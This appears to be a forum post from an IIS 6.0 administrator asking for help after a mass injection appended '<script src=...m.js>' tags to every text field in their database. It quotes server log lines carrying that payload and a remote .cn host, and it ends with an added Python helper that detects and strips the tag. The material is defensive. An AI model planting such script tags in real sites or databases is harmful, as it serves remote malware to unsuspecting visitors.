Somebody has been killing me.
Our uploads directory on IIS 6.0 has been violated.
I first thought it was our SQL Server PC or the web server PC.
I only open the ports: 80 (on the web server)
I only open the ports: 1433, 1434 (on the SQL server)
Still they come in.
It's a malicious .js script that appends the line
<script+src=http:/www.whatever??.cn/m.js></script>
(I've had 7 variations of the line so far) to every single field in my database that is nvarchar, char, or text.
This is what I found in the log on the web server:
2008-05-16 07:27:33 192.168.1.2 GET /uploads/site/915class.gif<script+src=http:/www.qiqi111.cn/m.js></script> - 80 - 212.165.147.42 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0;+SLCC1;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506;+.NET+CLR+1.1.4322) 404 0 2
2008-05-16 07:29:18 192.168.1.2 GET /uploads/site2/thumb11s.jpg<script+src=http:<script+src=http:/www.qiqi111.cn/m.js></script> - 80 - 212.165.147.42 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0;+SLCC1;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506;+.NET+CLR+1.1.4322) 404 0 2
2008-05-16 07:29:18 192.168.1.2 GET /uploads/site1/THUMB1.jpg<script+sr<script+src=http:/www.qiqi111.cn/m.js></script> - 80 - 212.165.147.42 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0;+SLCC1;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506;+.NET+CLR+1.1.4322) 404 0 2
This is just today's; the breach comes from a different IP every time. Today's is from Pakistan, for example.
I changed IIS to not run scripts and to allow only Read on the uploads directory.
They still do it.
I've even deleted, e.g., site1/1.jpg, and then when I check, that file is in the log again, and thus the script has been run against a file that does not even exist.
I have NOD32 antivirus on the web server, I have Spybot installed now, latest updates on both, etc.
I know what the contents of the script being run are; I just don't know how they do it.
Please help; nobody can, it seems.
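Added example (Python 3), not part of the original post: a small triage helper for the symptom described above. It parses IIS W3C log lines like the ones quoted, flags every request whose path carries the injected `<script` marker, pulls out the external host the marker points to together with the client IP and status, and includes a helper that strips the appended tag from a stored value so tainted database rows can be listed and reverted. The three log lines are the post's own, re-joined onto single lines; the `#Fields` header and the fourth, clean request are constructed, and the field order is assumed to be the IIS 6 default W3C layout, which the post's lines fit.

```python
import re
from collections import Counter

# Constructed sample input: the three IIS 6.0 W3C log lines quoted in the post,
# re-joined onto single lines, plus one ordinary request for contrast.
# The #Fields header is an assumption (IIS 6 default W3C field order); the
# post does not show that header line. IIS writes spaces in the URI as "+".
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2008-05-16 07:27:33 192.168.1.2 GET /uploads/site/915class.gif<script+src=http:/www.qiqi111.cn/m.js></script> - 80 - 212.165.147.42 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0;+SLCC1;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506;+.NET+CLR+1.1.4322) 404 0 2
2008-05-16 07:29:18 192.168.1.2 GET /uploads/site2/thumb11s.jpg<script+src=http:<script+src=http:/www.qiqi111.cn/m.js></script> - 80 - 212.165.147.42 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0;+SLCC1;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506;+.NET+CLR+1.1.4322) 404 0 2
2008-05-16 07:29:18 192.168.1.2 GET /uploads/site1/THUMB1.jpg<script+sr<script+src=http:/www.qiqi111.cn/m.js></script> - 80 - 212.165.147.42 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0;+SLCC1;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506;+.NET+CLR+1.1.4322) 404 0 2
2008-05-16 07:30:01 192.168.1.2 GET /uploads/site1/logo.gif - 80 - 10.0.0.5 Mozilla/4.0+(compatible;+MSIE+7.0) 200 0 0
"""

# The injected marker, whole or truncated ("<script+src=", "<script+sr<script...").
# A legitimate image path or plain-text field never contains "<script".
TAINT_RE = re.compile(r"<script", re.IGNORECASE)
# Host part of the "src=http:/host/..." reference; the post's lines use a single
# slash, so one or more slashes are accepted.
HOST_RE = re.compile(r"https?:/+([A-Za-z0-9.-]+)", re.IGNORECASE)


def parse_w3c(text):
    """Parse W3C extended log text into a list of {field: value} dicts."""
    fields = None
    records = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed or unexpectedly wrapped line; skip it
        records.append(dict(zip(fields, values)))
    return records


def find_injected_requests(records):
    """Return one finding per request whose URI stem carries the injected tag."""
    hits = []
    for r in records:
        stem = r["cs-uri-stem"]
        m = TAINT_RE.search(stem)
        if not m:
            continue
        hits.append({
            "time": f'{r["date"]} {r["time"]}',
            "client_ip": r["c-ip"],
            # the real file the reference pointed at before the tag was appended
            "requested_file": stem[:m.start()],
            "injected_hosts": sorted({h.lower() for h in HOST_RE.findall(stem)}),
            "status": r["sc-status"],
        })
    return hits


def summarize(hits):
    """Count findings per client IP and per external host referenced."""
    by_client = Counter(h["client_ip"] for h in hits)
    by_host = Counter(host for h in hits for host in h["injected_hosts"])
    return {"by_client": dict(by_client), "by_host": dict(by_host)}


def is_tainted(value):
    """True if a stored value (file name, nvarchar/char/text field) carries the marker."""
    return bool(TAINT_RE.search(value or ""))


def strip_injected(value):
    """Return the value with everything from the first "<script" onward removed.
    Assumes the legitimate value never contained "<script" (true for file names
    and plain text), so the original content is exactly the prefix."""
    m = TAINT_RE.search(value)
    return value if not m else value[:m.start()]


if __name__ == "__main__":
    findings = find_injected_requests(parse_w3c(SAMPLE_LOG))
    for h in findings:
        print(h["time"], h["client_ip"], h["status"], h["requested_file"],
              ",".join(h["injected_hosts"]))
    print(summarize(findings))
```

Counting findings per client IP and per referenced host gives a quick picture of which image references are being fetched with the tag appended and which external host they all point to; the same `TAINT_RE` can be run over nvarchar, char and text values pulled from the database to list the rows that need cleaning, and `strip_injected` recovers the original value for those rows.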